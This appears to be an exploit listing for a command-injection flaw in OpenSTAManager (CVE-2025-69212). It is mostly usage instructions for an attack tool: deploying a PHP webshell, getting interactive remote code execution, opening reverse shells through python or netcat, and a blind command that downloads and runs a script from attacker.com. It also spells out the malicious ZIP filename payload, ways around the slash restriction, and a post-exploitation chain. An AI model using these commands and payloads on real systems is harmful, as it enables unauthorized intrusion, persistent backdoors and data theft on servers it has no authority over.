Exploit for OS Command Injection in Devcode Openstamanager CVE-2025-69212

Name: Exploit for OS Command Injection in Devcode Openstamanager CVE-2025-69212
Rating: 5 (2 reviews)
2026-06-30 | CVSS 9.4
## https://sploitus.com/exploit?id=B4B4CA7A-D754-5C31-B526-5E199D0B91D5
# CVE-2025-69212

**OpenSTAManager  --check
```

### Vulnerability Check

```bash
# Auto-detect plugin and verify vulnerability
python3 exploit.py -t http://target.com -u admin -p secret --check

# With known module/plugin IDs
python3 exploit.py -t http://target.com -u admin -p secret --check --module-id 14 --plugin-id 23
```

### Webshell Deployment

```bash
# Deploy webshell to default directory (files/)
python3 exploit.py -t http://target.com -u admin -p secret --webshell

# Custom directory and filename
python3 exploit.py -t http://target.com -u admin -p secret --webshell --shell-dir uploads --shell-name .config.php
```

### Interactive RCE

```bash
# Deploy webshell + interactive shell
python3 exploit.py -t http://target.com -u admin -p secret --rce

# With existing webshell from previous run
python3 exploit.py -t http://target.com -u admin -p secret --webshell --rce
```

### Reverse Shell

```bash
# Python reverse shell (default)
python3 exploit.py -t http://target.com -u admin -p secret --reverse-shell 10.10.14.5 4444

# Netcat with mkfifo
python3 exploit.py -t http://target.com -u admin -p secret --reverse-shell 10.10.14.5 4444 --method nc

# Netcat with -e flag
python3 exploit.py -t http://target.com -u admin -p secret --reverse-shell 10.10.14.5 4444 --method nc-e
```

### Blind Command Execution

```bash
# Execute a command (no output returned)
python3 exploit.py -t http://target.com -u admin -p secret --cmd "id"

# Download and execute a payload
python3 exploit.py -t http://target.com -u admin -p secret --cmd "cd tmp && wget http://attacker.com/shell.sh && bash shell.sh"
```

### Network Options

```bash
# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --webshell --proxy http://127.0.0.1:8080

# With request delay (2 seconds)
python3 exploit.py -t http://target.com -u admin -p secret --check --delay 2

# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --check -k
```

## Full Option Reference

```
Target:
  -t, --target           Target base URL

Authentication:
  -u, --user             Username for login
  -p, --password         Password for login
  -c, --cookie           Existing PHPSESSID value

Actions:
  --check                Verify if target is vulnerable
  --webshell             Deploy PHP webshell
  --rce                  Interactive shell via webshell
  --reverse-shell        Reverse shell (LHOST LPORT)
  --cmd COMMAND          Blind command execution

Shell Options:
  --shell-dir DIR        Webshell write directory (default: files)
  --shell-name NAME      Custom webshell filename
  --method METHOD        Reverse shell method: python, nc, nc-e

Plugin Detection:
  --module-id ID         OpenSTAManager module ID
  --plugin-id ID         importFE_ZIP plugin ID

Network:
  --proxy URL            HTTP proxy URL
  -k, --no-ssl-verify    Disable SSL verification
  --delay SECONDS        Delay between requests
```

## Technical Details

### Payload Structure

The exploit crafts a ZIP archive containing a single `.p7m` file with a malicious filename:

```
invoice.p7m";INJECTED_COMMAND;echo ".p7m
```

When OpenSTAManager processes this file, the resulting `exec()` call becomes:

```
openssl smime -verify -noverify -in "invoice.p7m";INJECTED_COMMAND;echo ".p7m" -inform DER -out "..."
```

The shell interprets the semicolons as command separators, executing the injected command between the terminated `openssl` call and the trailing `echo`.

### ZipArchive Filename Constraint

> **Critical:** PHP's `ZipArchive::extractTo()` treats forward slashes (`/`) in filenames as directory separators per the ZIP specification. Any `/` in the malicious filename will cause the archive entry to be split into directories, breaking the exploit payload.

All injected commands must avoid `/` entirely:

| Blocked | Alternative |
|---|---|
| `/etc/passwd` | `cd etc && cat passwd` |
| `/usr/bin/python3` | `python3` (relies on PATH) |
| `/tmp/shell.sh` | `cd tmp && shell.sh` |
| `bash -i >& /dev/tcp/...` | Use python or nc methods instead |

### Reverse Shell Methods

| Method | Payload | Requires |
|---|---|---|
| `python` | `python3 -c "import socket,os,subprocess;..."` | Python 3 on target |
| `nc` | `rm -f .f;mkfifo .f;cat .f\|bash -i 2>&1\|nc HOST PORT > .f` | netcat + mkfifo |
| `nc-e` | `nc HOST PORT -e bash` | netcat with `-e` support |

The `python` method is the default and most reliable since it avoids `/` naturally and Python is commonly available on Linux servers.

### Vulnerable Code Path

```
Upload ZIP via importFE_ZIP plugin
    └── actions.php dispatches to plugin handler
        └── ZipArchive::extractTo() extracts files
            └── Iterates .p7m files
                └── XML::decodeP7M($filename)
                    └── exec('openssl smime ... -in "'.$filename.'"')
                        └── Shell interprets injected commands
```

## Attack Chain Example

```
1. --check             → Confirm RCE via marker file
2. --webshell          → Drop PHP shell to files/ directory
3. --rce               → Interactive command execution
4. Enumerate           → id, cat /etc/passwd, ifconfig
5. Pivot               → Reverse shell to attacker, post-exploitation
```

## Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing. The author assumes no liability for misuse.

## References

- [CVE-2025-69212 (NVD)](https://nvd.nist.gov/vuln/detail/CVE-2025-69212)
- [GitHub Security Advisory — GHSA-25fp-8w8p-mx36](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36)
- [OpenSTAManager Repository](https://github.com/devcode-it/openstamanager)
- [PoC by Lukasz Rybak](https://github.com/lukasz-rybak/CVE-2025-69212)